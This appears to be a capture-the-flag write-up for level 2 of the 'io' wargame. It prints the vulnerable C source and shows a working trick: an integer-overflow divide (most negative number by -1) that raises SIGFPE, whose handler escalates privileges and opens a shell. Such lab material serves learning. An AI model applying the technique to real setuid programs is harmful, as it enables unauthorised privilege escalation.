time to play
|
1 2 |
level2@io:/levels$ ./level02 source code is available in level02.c |
let’s read what it says
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
level2@io:/levels$ cat level02.c //a little fun brought to you by bla #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <setjmp.h> void catcher(int a) { setresuid(geteuid(),geteuid(),geteuid()); printf("WIN!\n"); system("/bin/sh"); exit(0); } int main(int argc, char **argv) { puts("source code is available in level02.c\n"); if (argc != 3 || !atoi(argv[2])) return 1; signal(SIGFPE, catcher); return abs(atoi(argv[1])) / atoi(argv[2]); } level2@io:/levels$ |
first function catcher and it trigger the suid and drop the bash nice this is what we want
the main function takes arguments
print a string
if statement says
if not 3 arguments or the 2nd argument, not a number
return 1
else
trigger signal SIGFPE for function catcher
let’s make a search for SIGFPE
http://www.gnu.org/software/libc/manual/html_node/Program-Error-Signals.html
this signal responsible for arithmetical errors like divide by Zero (this is interesting )
then the abs function return the absolute value of divided arg 1 and arg 2
so let’s play again
|
1 2 3 4 5 6 |
level2@io:/levels$ ./level02 1233 0 source code is available in level02.c level2@io:/levels$ echo $? 1 level2@io:/levels$ |
seems we fall in the if statement coz it returns 1
so we need a hint 😀
after digging around I got the hint to guess what 😀
after u read the “full” manual page for SIGFPE here is the hint inside the notes xD “l. (Also dividing the most negative integer by -1 may generate SIGFPE.)”
ref: http://linux.die.net/man/2/signal
so let’s give it the most negative 😀
|
1 2 3 4 5 |
level2@io:/levels$ ./level02 -994949494994949494491233 -1 source code is available in level02.c WIN! sh-4.2$ |
w000t
btw i know that is weird because ( -994949494994949494491233/-1) = 9.94949495E23
but this how posix work